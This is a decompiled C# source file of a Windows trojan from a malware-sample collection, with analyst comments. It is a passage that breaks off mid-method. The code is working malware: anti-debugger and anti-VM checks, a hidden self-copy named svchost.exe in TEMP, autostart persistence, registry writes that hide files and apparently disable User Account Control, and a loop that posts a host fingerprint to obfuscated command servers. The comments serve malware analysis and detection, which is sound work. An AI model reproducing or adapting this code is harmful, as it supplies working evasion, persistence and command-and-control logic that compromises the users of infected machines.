MalwareSourceCode/MSIL/Trojan/Win32/R/Trojan.Win32.Reconyc.efsu-49381cd9042bc3cc4ed4ef172003f6330ee39256d57a554e08499cf3b3054e87/_003F1_003F.cs

// Decompiled with JetBrains decompiler
// Type: ?1?.?1?
// Assembly: svchost, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0572F6A4-2AE0-441B-8B88-3FB3343AE211
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Reconyc.efsu-49381cd9042bc3cc4ed4ef172003f6330ee39256d57a554e08499cf3b3054e87.exe
using \u003F1\u003F;
using Microsoft.Win32;
using System;
using System.Collections;
using System.Data;
using System.Diagnostics;
using System.Globalization;
using System.IO;
using System.Management;
using System.Net;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;
using System.Windows.Forms;
using System.Xml;
namespace \u003F1\u003F
{
internal class \u003F1\u003F
{
// Static configuration and cached host values for this class.
// Every string literal is stored obfuscated and passed through ?195?.?196? (decoder not in this view).
// Decoded values quoted in these comments are inferred from the literals themselves - confirm against the decoder.
//
// ?141?..?155?: each flag gates one early-exit environment check in ?38? (debugger, timing,
// running-process names, display-adapter description, window-title test).
private static bool \u003F141\u003F = true;
private static bool \u003F142\u003F = true;
private static bool \u003F143\u003F = true;
private static bool \u003F144\u003F = true;
private static bool \u003F145\u003F = true;
private static bool \u003F146\u003F = true;
private static bool \u003F147\u003F = true;
private static bool \u003F148\u003F = true;
private static bool \u003F149\u003F = true;
private static bool \u003F150\u003F = true;
private static bool \u003F151\u003F = true;
private static bool \u003F152\u003F = true;
private static bool \u003F153\u003F = true;
private static bool \u003F154\u003F = true;
private static bool \u003F155\u003F = true;
// File name of the copy that ?38? writes under the TEMP directory and registers for autostart
// (inferred decode: "svchost.exe").
private static string \u003F156\u003F = \u003F195\u003F.\u003F196\u003F("xżɪ͠Ѩյٱܪ\u0866ॺ\u0A64");
// Two request targets handed to ?36? (WebRequest.Create): ?38? starts with index 0 and
// switches to index 1 after any exception in its polling loop. Not decoded here.
private static string[] \u003F157\u003F = new string[2]
{
\u003F195\u003F.\u003F196\u003F("ZŅɄ͟ДԂ\u0603݈ࡅेੜ\u0B55\u0C49\u0D49๗ཆၐᅗቅ\u136Dᐰᕿᙬ\u1777\u187B\u197A\u1A7D᭳\u1C38ᵻṱὧ‽Ⅱ≱⍡\u246F╡☣⡥⥧⩦⭢ⱥ\u2D71⸪⽳なㅱ"),
\u003F195\u003F.\u003F196\u003F("tůɮͩТԸعݠ\u0864ॷੳ\u0B65\u0C75ർรའၥᅨቸ፦ᑻᕨᙠ\u1771ᠪᥬᩰ᭦")
};
// Sent as one field of the request body built in ?38? (inferred decode: "1.0").
private static string \u003F158\u003F = \u003F195\u003F.\u003F196\u003F("2Ĭȱ");
// Polling interval: ?38? sleeps Convert.ToInt32(this) * 60000 ms per loop (inferred decode: "5").
private static string \u003F159\u003F = \u003F195\u003F.\u003F196\u003F("4");
// UI culture name from its 4th character on (the region part of a name such as "en-US");
// Substring(3) throws during type initialisation if the name is shorter than 3 characters.
private static string \u003F160\u003F = CultureInfo.CurrentUICulture.Name.Substring(3);
// ?161? gates a start-up sleep of Convert.ToInt32(?162?) seconds in ?38?.
// NOTE(review): ?162? appears to decode to the non-numeric text "Delay", in which case the
// conversion throws and the empty catch skips the sleep - confirm.
private static bool \u003F161\u003F = true;
private static string \u003F162\u003F = \u003F195\u003F.\u003F196\u003F("AšɯͣѸ");
// ?163?..?166? gate individual registry/process actions inside the ?167? block of ?38?.
private static bool \u003F163\u003F = false;
private static bool \u003F164\u003F = false;
private static bool \u003F165\u003F = false;
private static bool \u003F166\u003F = false;
// ?167? selects HKLM (true) or HKCU (false) for the autostart value and enables the policy block.
private static bool \u003F167\u003F = true;
// ?168? makes ?38? start ?45? (not in this view) on a separate thread.
private static bool \u003F168\u003F = false;
// ?169? and ?170? are not referenced in the part of the class visible here.
private static string \u003F169\u003F = \u003F195\u003F.\u003F196\u003F("VŮɥͨщչٸݦ\u087Aॊ\u0A63\u0B76\u0C77ൢ\u0E65ཤ");
private static string \u003F170\u003F = \u003F195\u003F.\u003F196\u003F("HŬɧͮяջٺݨ\u0874॑੭\u0B77౮\u0D64");
// Host fingerprint: MD5 hex (?31?) of the concatenated WMI values returned by ?34?.
private static string \u003F171\u003F = \u003F1\u003F.\u003F1\u003F.\u003F31\u003F(\u003F1\u003F.\u003F1\u003F.\u003F34\u003F());
// ?172? enables the relaunch-from-TEMP branch of ?38?, which ends with Environment.Exit(0).
private static bool \u003F172\u003F = false;
// Module handle stored by ?39? (result of its last LoadLibrary call) and reused by ?40?.
private static IntPtr \u003F173\u003F;
// Last non-empty server response that ?38? passed to ?41?; used to skip repeats.
private static string \u003F174\u003F = string.Empty;
private static string \u003F175\u003F = Environment.MachineName;
// Instance of ?4?, a type declared outside this view.
private static \u003F4\u003F \u003F176\u003F = new \u003F4\u003F();
public static string \u003F177\u003F;
private static string \u003F178\u003F = string.Empty;
// OS label from ?35?() followed by the suffix from ?27?(); sent in the request body.
private static string \u003F179\u003F = \u003F1\u003F.\u003F1\u003F.\u003F35\u003F() + \u003F1\u003F.\u003F1\u003F.\u003F27\u003F();
// Returns true when at least one running process has the given name (Process.GetProcessesByName).
// ?38? calls this with fixed, obfuscated names as part of its early-exit environment checks.
public static bool \u003F26\u003F(string _param0) => Process.GetProcessesByName(_param0).Length > 0;
// Reads one value under an HKLM key and returns one of two fixed strings depending on whether the
// value text contains a marker substring. The result is appended to the OS label in ?179?.
// Inferred decodes (decoder ?195?.?196? is not in this view - confirm): value name "Identifier",
// marker "x86", results " (32 Bit)" when the marker is present and " (64 Bit)" otherwise.
// No null checks: a missing key or value throws NullReferenceException out of this method.
public static string \u003F27\u003F()
{
string str = \u003F195\u003F.\u003F196\u003F("");
return !Registry.LocalMachine.OpenSubKey(\u003F195\u003F.\u003F196\u003F("fŌɞ͏ѝՈ݂ٚ\u087Aॡੁ\u0B50ు\u0D53้\u0F6Fၪᅴታ\u1375ᑆᕊᙡᝤᡢᥰ᩹\u1B4F᱑ᵴṾύ⁼≠⍛\u2478╦♫❢⡵⥶⩫⭱ⱞⴱ")).GetValue(\u003F195\u003F.\u003F196\u003F("CŭɭͩѲլ٢ݪ\u0867ॳ")).ToString().Contains(\u003F195\u003F.\u003F196\u003F("{ĺȷ")) ? str + \u003F195\u003F.\u003F196\u003F(")Ġȱ̲ХՆ٪ݶࠨ") : \u003F195\u003F.\u003F196\u003F(")Ġȴ̴ХՆ٪ݶࠨ");
}
// Runs a WMI query and returns one property of the result as a string; when several objects are
// returned only the last one is kept, and an empty result set yields the decoded empty string.
// One of the three inputs to the host fingerprint (?34? -> ?31? -> ?171?).
// Inferred decodes (confirm against ?195?.?196?): namespace "root\CIMV2", property "ProcessorId".
public static string \u003F28\u003F()
{
ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(\u003F195\u003F.\u003F196\u003F("xŦɧͳњՆٍݎࡔळ"), \u003F195\u003F.\u003F196\u003F("fűɿͷѲդ؏܄ࠍ४\u0A79\u0B65\u0C64ഈ\u0E70ཏ။ᄗሑ\u137Dᑱᕒᙰ\u177D\u1878\u196Fᩨ᭵ᱫᴸṀ\u1F5E⁐≖⌲\u2455╵♹❧⡮⥩⩂⭎Ⱙⴵ⸧⼡うㅔ\u3256㌲㐦"));
string str = \u003F195\u003F.\u003F196\u003F("");
// Each iteration overwrites the previous value.
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
str = Convert.ToString(managementBaseObject[\u003F195\u003F.\u003F196\u003F("[ŸɦͫѢյٶݫ\u0871ो\u0A65")]);
return str;
}
// Runs a WMI query and returns one property of the last result object as a string.
// Uses the same query and property literals as ?30?; this copy feeds the host fingerprint in ?34?.
// Inferred decodes (confirm against ?195?.?196?): namespace "root\CIMV2", property "Description".
public static string \u003F29\u003F()
{
ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(\u003F195\u003F.\u003F196\u003F("xŦɧͳњՆٍݎࡔळ"), \u003F195\u003F.\u003F196\u003F("pŧɭͥќՊؽܶ࠻ड़ੋୗౚശโཽၽᄡሣፏᑙᕧᙩᝩᡤ᥉ᩦ᭦ᱳᵴṪὨ\u206FⅧ≳"));
string str = \u003F195\u003F.\u003F196\u003F("");
// Each iteration overwrites the previous value.
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
str = Convert.ToString(managementBaseObject[\u003F195\u003F.\u003F196\u003F("Oůɺͫѵկٵݰ\u086A७੯")]);
return str;
}
// Same WMI query and property as ?29?, starting from string.Empty instead of a decoded empty string.
// ?38? compares the result with fixed strings and returns early on a match - presumably a check for
// virtual-machine display adapters (TODO confirm by decoding the compared literals).
// Inferred decodes (confirm against ?195?.?196?): namespace "root\CIMV2", property "Description".
public static string \u003F30\u003F()
{
ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(\u003F195\u003F.\u003F196\u003F("xŦɧͳњՆٍݎࡔळ"), \u003F195\u003F.\u003F196\u003F("pŧɭͥќՊؽܶ࠻ड़ੋୗౚശโཽၽᄡሣፏᑙᕧᙩᝩᡤ᥉ᩦ᭦ᱳᵴṪὨ\u206FⅧ≳"));
string empty = string.Empty;
// Each iteration overwrites the previous value.
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
empty = Convert.ToString(managementBaseObject[\u003F195\u003F.\u003F196\u003F("Oůɺͫѵկٵݰ\u086A७੯")]);
return empty;
}
// Returns the MD5 digest of _param0 as a string, one formatted chunk per digest byte;
// null or empty input returns string.Empty. Used to turn the WMI values from ?34? into ?171?.
// The text is encoded with Encoding.Default, so the digest depends on the system ANSI code page.
// The per-byte format string is obfuscated (inferred decode: "x2", i.e. lowercase hex - confirm).
// MD5 serves only as an identifier here; nothing in view relies on it for integrity.
public static string \u003F31\u003F(string _param0)
{
switch (_param0)
{
case null:
return string.Empty;
default:
if (_param0.Length != 0)
{
byte[] hash = new MD5CryptoServiceProvider().ComputeHash(Encoding.Default.GetBytes(_param0));
StringBuilder stringBuilder = new StringBuilder();
for (int index = 0; index < hash.Length; ++index)
stringBuilder.Append(hash[index].ToString(\u003F195\u003F.\u003F196\u003F("zij")));
return stringBuilder.ToString();
}
// Empty string: decompiler-generated jump to the null case, which returns string.Empty.
goto case null;
}
}
// Runs a third WMI query and returns one property of the last result object as a string.
// Third input to the host fingerprint assembled in ?34?. The query and property names are
// obfuscated and not decoded here; the namespace literal is the same one used by ?28? and ?29?.
public static string \u003F32\u003F()
{
ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(\u003F195\u003F.\u003F196\u003F("xŦɧͳњՆٍݎࡔळ"), \u003F195\u003F.\u003F196\u003F("Nřɗ͟њՌطܼ࠵॒ੁଢ଼\u0C5Cര๘ཧၣᄿሹፕᑋᕩᙴᝣᡇᥫᩢ᭰ᱥ"));
string str = \u003F195\u003F.\u003F196\u003F("");
// Each iteration overwrites the previous value.
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
str = Convert.ToString(managementBaseObject[\u003F195\u003F.\u003F196\u003F("_Ůɸ͠ѩիوݰ\u0869ॡ\u0B73")]);
return str;
}
// P/Invoke binding for kernel32!GetProcAddress under an obfuscated managed name.
// ?39? and ?40? use it to resolve exports by name at run time, so the resolved functions
// do not appear as DllImport declarations or import-table entries of this assembly.
[DllImport("kernel32", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern IntPtr \u003F33\u003F(IntPtr _param0, string _param1);
// Concatenates the three WMI-derived strings from ?28?, ?29? and ?32?; the result is hashed by ?31?
// to form the host identifier ?171? that ?38? sends in its request body.
public static string \u003F34\u003F() => \u003F1\u003F.\u003F1\u003F.\u003F28\u003F() + \u003F1\u003F.\u003F1\u003F.\u003F29\u003F() + \u003F1\u003F.\u003F1\u003F.\u003F32\u003F();
// Maps Environment.OSVersion to a fixed label and returns it; used as the first half of ?179?.
// The goto/label layout is decompiler output. Effective order: Win32Windows minor 10 / 90, then
// Win32NT major 4, major 5 (minor 0/1/2), major 6 (minor 0/1), then a fallback label when nothing
// matched. The labels are obfuscated and not decoded here (presumably Windows product names - confirm).
public static string \u003F35\u003F()
{
OperatingSystem osVersion = Environment.OSVersion;
string str = \u003F195\u003F.\u003F196\u003F("");
if (osVersion.Platform == PlatformID.Win32Windows)
goto label_12;
label_2:
if (osVersion.Platform == PlatformID.Win32NT)
goto label_15;
label_10:
// No branch assigned a label: fall back to the default one.
if (str == \u003F195\u003F.\u003F196\u003F(""))
goto label_19;
label_11:
return str;
label_19:
str = \u003F195\u003F.\u003F196\u003F("OŷɺͲѽմٺݽ\u0866ॴਰ\u0B58౧ൣ\u0E68ཤၽᅺሥፑᑣᕷᙷᝪᡭ\u196F");
goto label_11;
label_15:
// Win32NT platform: select by major version, then by minor version.
if (osVersion.Version.Major == 4)
goto label_16;
label_3:
if (osVersion.Version.Major == 5)
goto label_17;
label_7:
if (osVersion.Version.Major == 6)
{
switch (osVersion.Version.Minor)
{
case 0:
str = \u003F195\u003F.\u003F196\u003F("ZťɥͮѦտٴܦࡓ७ੰ\u0B76ౠ");
goto label_10;
case 1:
str = \u003F195\u003F.\u003F196\u003F("^šɩ͢Ѫճٰܢ࠶");
goto label_10;
default:
goto label_10;
}
}
else
goto label_10;
label_17:
switch (osVersion.Version.Minor)
{
case 0:
str = \u003F195\u003F.\u003F196\u003F("[Ţɤͭѧհٵܥ࠶ळਲ\u0B31");
goto label_7;
case 1:
str = \u003F195\u003F.\u003F196\u003F("]Šɦͣѩղٷܣ࡚॑");
goto label_7;
case 2:
str = \u003F195\u003F.\u003F196\u003F("DŻɿʹѠչپܬࡘ९\u0A7B\u0B7Eౢ\u0D74ล༶ဳᄲሲ");
goto label_7;
default:
goto label_7;
}
label_16:
str = \u003F195\u003F.\u003F196\u003F("YŤɢͯѥվٻܧࡈ॑ਤଷబറ");
goto label_3;
label_12:
// Win32Windows platform: select by minor version only.
if (osVersion.Version.Minor == 10)
goto label_13;
label_1:
if (osVersion.Version.Minor == 90)
{
str = \u003F195\u003F.\u003F196\u003F("]Šɦͣѩղٷܣࡏ।");
goto label_2;
}
else
goto label_2;
label_13:
str = \u003F195\u003F.\u003F196\u003F("]Šɦͣѩղٷܣ࠻ह");
goto label_1;
}
// Sends _param1 as the request body to the URL in _param0 and returns the response text, trimmed
// (null when GetResponse returns null). This is the only network call in the visible code; ?38?
// uses it for its periodic check-in.
// Inferred decodes (confirm against ?195?.?196?): method "POST"; the content type is presumably
// "application/x-www-form-urlencoded".
// Nothing here adds authentication or encryption to the body. No User-Agent is set on the
// WebRequest, which can be a useful network-detection attribute.
// Any WebException or IOException propagates to the caller; the response and reader are not disposed.
private static string \u003F36\u003F(string _param0, string _param1)
{
ServicePointManager.Expect100Continue = true;
WebRequest webRequest = WebRequest.Create(_param0);
webRequest.ContentType = \u003F195\u003F.\u003F196\u003F("@ŐɯͲѴտٺݮ\u0870ॷ\u0A79ହ౭ഹ\u0E64ཥၦᄽቩ፡ᑿᕡᘦ\u177F\u187Bᥤᩢ᭨ᱦᵫṧὧ\u2065");
webRequest.Method = \u003F195\u003F.\u003F196\u003F("TŌɑ͕");
// ASCII encoding: any non-ASCII character in the body is replaced with '?'.
byte[] bytes = Encoding.ASCII.GetBytes(_param1);
webRequest.ContentLength = (long) bytes.Length;
Stream requestStream = webRequest.GetRequestStream();
requestStream.Write(bytes, 0, bytes.Length);
requestStream.Close();
WebResponse response = webRequest.GetResponse();
return response != null ? new StreamReader(response.GetResponseStream()).ReadToEnd().Trim() : (string) null;
}
// P/Invoke binding for kernel32!LoadLibrary under an obfuscated managed name.
// ?39? uses it to load native libraries from a path built at run time.
[DllImport("kernel32.dll", EntryPoint = "LoadLibrary")]
private static extern IntPtr \u003F37\u003F(string _param0);
// Start-up routine (takes string[]; presumably the program entry point - confirm in the assembly).
// Analyst summary of what the visible code does, in order:
//   1. single-instance guard via a named mutex;
//   2. a chain of environment checks, each behind a config flag, that return silently when an
//      analysis or virtualised environment is suspected;
//   3. registry changes, a hidden self-copy into the TEMP directory and an autostart value;
//   4. an endless polling loop that POSTs host data via ?36? and hands the reply to ?41?.
// Every step sits in try / empty catch, so failures leave no error output.
// Decoded strings quoted below are inferred from the literals; the decoder ?195?.?196? is not in
// this view, so confirm them before using them as indicators.
private static void \u003F38\u003F(string[] _param0)
{
// Single-instance guard: exit if the fixed, obfuscated mutex name already exists.
bool createdNew = false;
Mutex mutex = new Mutex(true, \u003F195\u003F.\u003F196\u003F("gĨȢ̬ЬԺاܡ࠹दਦଥతഢ\u0E3B༸းᄺሾጱᐰᔪᘲ\u1737ᠵᤲᨷ᭼"), out createdNew);
if (!createdNew)
return;
// Optional background thread running ?45? (not in this view).
if (\u003F1\u003F.\u003F1\u003F.\u003F168\u003F)
{
try
{
new Thread(new ThreadStart(\u003F1\u003F.\u003F1\u003F.\u003F45\u003F)).Start();
}
catch
{
}
}
// Environment check: managed debugger attached.
if (\u003F1\u003F.\u003F1\u003F.\u003F142\u003F)
{
try
{
if (Debugger.IsAttached)
return;
}
catch
{
}
}
// Environment check: sleep 10 ms and exit if fewer than 10 ticks (100 ns each) elapsed,
// i.e. the sleep was skipped or accelerated.
if (\u003F1\u003F.\u003F1\u003F.\u003F143\u003F)
{
try
{
long ticks = DateTime.Now.Ticks;
Thread.Sleep(10);
if (DateTime.Now.Ticks - ticks < 10L)
return;
}
catch
{
}
}
// Environment check: running process name (inferred decode: "NETSTAT").
if (\u003F1\u003F.\u003F1\u003F.\u003F145\u003F)
{
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F26\u003F(\u003F195\u003F.\u003F196\u003F("IŃɑ͗їՃٕ")))
return;
}
catch
{
}
}
// Environment check: show a fully transparent form with a fixed title (inferred decode: "TEST")
// and exit if the title reads back as a different fixed string - presumably detects a sandbox
// that decorates window titles (TODO confirm by decoding the second literal).
if (\u003F1\u003F.\u003F1\u003F.\u003F150\u003F)
{
try
{
Form form = new Form();
form.Text = \u003F195\u003F.\u003F196\u003F("Pņɑ͕");
form.Opacity = 0.0;
form.ShowInTaskbar = false;
form.Show();
if (form.Text == \u003F195\u003F.\u003F196\u003F("WĨɗ̩ќՂٕݑࠤक़ਡଡ଼"))
return;
form.Close();
}
catch
{
}
}
// Environment check: running process name (inferred decode: "FILEMON").
if (\u003F1\u003F.\u003F1\u003F.\u003F144\u003F)
{
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F26\u003F(\u003F195\u003F.\u003F196\u003F("Aŏɉ́юՍُ")))
return;
}
catch
{
}
}
// Environment check: running process name (inferred decode: "PROCMON").
if (\u003F1\u003F.\u003F1\u003F.\u003F148\u003F)
{
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F26\u003F(\u003F195\u003F.\u003F196\u003F("WŔɊ͇юՍُ")))
return;
}
catch
{
}
}
// Environment check: running process name (inferred decode: "REGMON").
if (\u003F1\u003F.\u003F1\u003F.\u003F149\u003F)
{
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F26\u003F(\u003F195\u003F.\u003F196\u003F("TŀɃ͎эՏ")))
return;
}
catch
{
}
}
// Environment check: running process name (inferred decode: "CAIN").
if (\u003F1\u003F.\u003F1\u003F.\u003F141\u003F)
{
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F26\u003F(\u003F195\u003F.\u003F196\u003F("Głɋ͏")))
return;
}
catch
{
}
}
// Environment check: running process name (inferred decode: "NETMON").
if (\u003F1\u003F.\u003F1\u003F.\u003F146\u003F)
{
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F26\u003F(\u003F195\u003F.\u003F196\u003F("Hŀɐ͎эՏ")))
return;
}
catch
{
}
}
// Environment check: running process name (inferred decode: "TCPVIEW").
if (\u003F1\u003F.\u003F1\u003F.\u003F151\u003F)
{
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F26\u003F(\u003F195\u003F.\u003F196\u003F("SŅɕ͒ъՇٖ")))
return;
}
catch
{
}
}
// Environment check: running process name (inferred decode: "WIRESHARK").
if (\u003F1\u003F.\u003F1\u003F.\u003F155\u003F)
{
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F26\u003F(\u003F195\u003F.\u003F196\u003F("^Łɕ̓іՌقݐࡊ")))
return;
}
catch
{
}
}
// The next four checks compare the WMI display-adapter description from ?30? with fixed strings
// and exit on an exact match - presumably virtual-machine adapter names (not decoded here).
if (\u003F1\u003F.\u003F1\u003F.\u003F147\u003F)
{
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F30\u003F() == \u003F195\u003F.\u003F196\u003F("Gŷɧ͵ѿվٴݼ\u087Cमਜ਼\u0B65౯൯\u0E66༨၆ᅢቤ\u1374ᑷᕧᙳ"))
return;
}
catch
{
}
}
if (\u003F1\u003F.\u003F1\u003F.\u003F154\u003F)
{
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F30\u003F() == \u003F195\u003F.\u003F196\u003F("XŀɻͪѸլبݔࡐू\u0A45ଣోൈ"))
return;
}
catch
{
}
}
if (\u003F1\u003F.\u003F1\u003F.\u003F152\u003F)
{
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F30\u003F() == \u003F195\u003F.\u003F196\u003F("MųɫͬѢշٹݖ\u087C४\u0A31ୗ\u0C7D൯\u0E7Dཤၢᅩቺጨᑆᕢᙤ\u1774ᡷᥧᩳ"))
return;
}
catch
{
}
}
if (\u003F1\u003F.\u003F1\u003F.\u003F153\u003F)
{
try
{
string[] strArray = new string[2]
{
\u003F195\u003F.\u003F196\u003F("Oŕȷ͗ѱհٺݦ\u0878ॿ\u0A61\u0B7Dభൟุ\u0F2Aၝᅺቮ\u1369ᐶᔶᘬ᜴ᠵ"),
\u003F195\u003F.\u003F196\u003F("_ĸȪ͝Ѻծ٩ܶ࠶ब\u0A34ଵ")
};
foreach (string str in strArray)
{
if (\u003F1\u003F.\u003F1\u003F.\u003F30\u003F() == str)
return;
}
}
catch
{
}
}
// Optional start-up delay of ?162? seconds; a non-numeric ?162? makes Convert.ToInt32 throw and
// the empty catch skips the delay.
if (\u003F1\u003F.\u003F1\u003F.\u003F161\u003F)
{
try
{
Thread.Sleep(Convert.ToInt32(\u003F1\u003F.\u003F1\u003F.\u003F162\u003F) * 1000);
}
catch
{
}
}
// HKCU registry write (DWord). Inferred decode: value name "Hidden", data "2"; the key is
// presumably the Explorer "Advanced" settings key, i.e. hidden files stop being displayed.
try
{
Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("hŕɟ͌р\u0557هݑ\u086Fॿ\u0A58\u0B53\u0C5Dു\u0E5Eགྷ၍ᅞት\u137Fᑎᕈᙁᝋᡔᥑ\u1A7D᭣ᱪᵬṯό\u2075≏⍽\u2465╥♼\u277B⡽⥎⩔⭨Ɀⵢ\u2E62⽾のㅸ\u3255㍉㑣㕰㙤㝪㡠㥧㩥"), true).SetValue(\u003F195\u003F.\u003F196\u003F("NŬɠͧѧկ"), (object) \u003F195\u003F.\u003F196\u003F("3"), RegistryValueKind.DWord);
}
catch
{
}
// Self-copy: read the running executable and write it to <TEMP>\<?156?>, then mark the copy
// Hidden. Inferred decode: environment variable "TEMP", separator "\", file name "svchost.exe".
// Detection: a file with a system-process name created under a user TEMP directory.
try
{
FileStream fileStream1 = new FileStream(Process.GetCurrentProcess().MainModule.FileName, FileMode.Open, FileAccess.Read);
byte[] buffer = new byte[fileStream1.Length];
fileStream1.Read(buffer, 0, buffer.Length);
fileStream1.Close();
FileStream fileStream2 = new FileStream(Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("]") + \u003F1\u003F.\u003F1\u003F.\u003F156\u003F, FileMode.Create);
fileStream2.Write(buffer, 0, buffer.Length);
fileStream2.Close();
fileStream2.Dispose();
System.IO.File.SetAttributes(Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("]") + \u003F1\u003F.\u003F1\u003F.\u003F156\u003F, FileAttributes.Hidden);
}
catch
{
}
// Persistence: write a registry value whose data is the path of the TEMP copy, under HKLM when
// ?167? is set and under HKCU otherwise (same key and value name in both branches).
// Inferred decode: value name "Audio HD Driver"; the key is presumably the
// ...\CurrentVersion\Run autostart key - confirm.
try
{
if (\u003F1\u003F.\u003F1\u003F.\u003F167\u003F)
Registry.LocalMachine.OpenSubKey(\u003F195\u003F.\u003F196\u003F("~Ńɍ͞ўՉٕ݃\u0879३\u0A4Aୁ\u0C53\u0D4F\u0E6Cཱၻᅨቇፍᑰᕶᙳ\u1779ᡢᥧᩏ᭑ᱤᵢṽὫ\u2063ⅸ≝⍯\u247B╻♮⡫⥘⩑⭷Ɐ"), true).SetValue(\u003F195\u003F.\u003F196\u003F("NŻɩͥѤԪف\u074Cࠧू\u0A77୭\u0C75൧\u0E73"), (object) (Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("]") + \u003F1\u003F.\u003F1\u003F.\u003F156\u003F));
else
Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("~Ńɍ͞ўՉٕ݃\u0879३\u0A4Aୁ\u0C53\u0D4F\u0E6Cཱၻᅨቇፍᑰᕶᙳ\u1779ᡢᥧᩏ᭑ᱤᵢṽὫ\u2063ⅸ≝⍯\u247B╻♮⡫⥘⩑⭷Ɐ"), true).SetValue(\u003F195\u003F.\u003F196\u003F("NŻɩͥѤԪف\u074Cࠧू\u0A77୭\u0C75൧\u0E73"), (object) (Environment.GetEnvironmentVariable(\u003F195\u003F.\u003F196\u003F("Pņɏ͑")) + \u003F195\u003F.\u003F196\u003F("]") + \u003F1\u003F.\u003F1\u003F.\u003F156\u003F));
}
catch
{
}
// Policy/settings block, enabled by ?167?. These writes are high-signal detection points because
// they change user-protection settings rather than application state.
if (\u003F1\u003F.\u003F1\u003F.\u003F167\u003F)
{
// HKCU DWord write on the same key as the "Hidden" value above
// (inferred decode: "EnableBalloonTips" = "0").
try
{
Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("hŕɟ͌р\u0557هݑ\u086Fॿ\u0A58\u0B53\u0C5Dു\u0E5Eགྷ၍ᅞት\u137Fᑎᕈᙁᝋᡔᥑ\u1A7D᭣ᱪᵬṯό\u2075≏⍽\u2465╥♼\u277B⡽⥎⩔⭨Ɀⵢ\u2E62⽾のㅸ\u3255㍉㑣㕰㙤㝪㡠㥧㩥"), true).SetValue(\u003F195\u003F.\u003F196\u003F("Tžɮͬѡթىݫ\u0865।੨୩౫\u0D50\u0E6Aིၲ"), (object) \u003F195\u003F.\u003F196\u003F("1"), RegistryValueKind.DWord);
}
catch
{
}
// Same DWord value written under both HKCU and HKLM (inferred decode: "EnableLUA" = "0",
// which would turn off User Account Control; key presumably the Policies\System key).
try
{
Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("jŗɑ͂тՕفݗ\u086D\u0A46୍\u0C5Fൃ๘ཅ၏ᅜቻ\u1371ᕊᙇᝍᡖᥓᩃ᭝ᱨᵮṩ\u1F7F\u2077\u2467╧♺\u277D⡿⥌⩟⭡ⱡⵥ\u2E68⽣ぬㅻ\u325B㍕㑼㕷㙷㝧㡬"), true).SetValue(\u003F195\u003F.\u003F196\u003F("LŦɦͤѩաُݗࡀ"), (object) \u003F195\u003F.\u003F196\u003F("1"), RegistryValueKind.DWord);
Registry.LocalMachine.OpenSubKey(\u003F195\u003F.\u003F196\u003F("jŗɑ͂тՕفݗ\u086D\u0A46୍\u0C5Fൃ๘ཅ၏ᅜቻ\u1371ᕊᙇᝍᡖᥓᩃ᭝ᱨᵮṩ\u1F7F\u2077\u2467╧♺\u277D⡿⥌⩟⭡ⱡⵥ\u2E68⽣ぬㅻ\u325B㍕㑼㕷㙷㝧㡬"), true).SetValue(\u003F195\u003F.\u003F196\u003F("LŦɦͤѩաُݗࡀ"), (object) \u003F195\u003F.\u003F196\u003F("1"), RegistryValueKind.DWord);
}
catch
{
}
// Optional (?163?): create the HKCU key if missing, then write a DWord
// (inferred decode: "DisableCMD" = "2"). This branch has no try/catch of its own.
if (\u003F1\u003F.\u003F1\u003F.\u003F163\u003F)
{
if (Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("yņɎ͓ёՄٖ݆\u087Eॱ\u0A4F\u0B73\u0C77ൾ\u0E75ཾၩᅅቕ\u137Eᑵᕧᙻᝠ\u187D\u1977ᩤ᭓᱙ᵤṢὯ\u2065≻⍛\u2455╼♷\u2777⡧⥬")) == null)
{
Registry.CurrentUser.CreateSubKey(\u003F195\u003F.\u003F196\u003F("yņɎ͓ёՄٖ݆\u087Eॱ\u0A4F\u0B73\u0C77ൾ\u0E75ཾၩᅅቕ\u137Eᑵᕧᙻᝠ\u187D\u1977ᩤ᭓᱙ᵤṢὯ\u2065≻⍛\u2455╼♷\u2777⡧⥬"));
Registry.CurrentUser.OpenSubKey(\u003F195\u003F.\u003F196\u003F("yņɎ͓ёՄٖ݆\u087Eॱ\u0A4F\u0B73\u0C77ൾ\u0E75ཾၩᅅቕ\u137Eᑵᕧᙻᝠ\u187D\u1977ᩤ᭓᱙ᵤṢὯ\u2065≻⍛\u2455╼♷\u2777⡧⥬"), true).SetValue(\u003F195\u003F.\u003F196\u003F("NŠɻͦѤթ١݀ࡏॅ"), (object) \u003F195\u003F.\u003F196\u003F("3"), RegistryValueKind.DWord);
}
else
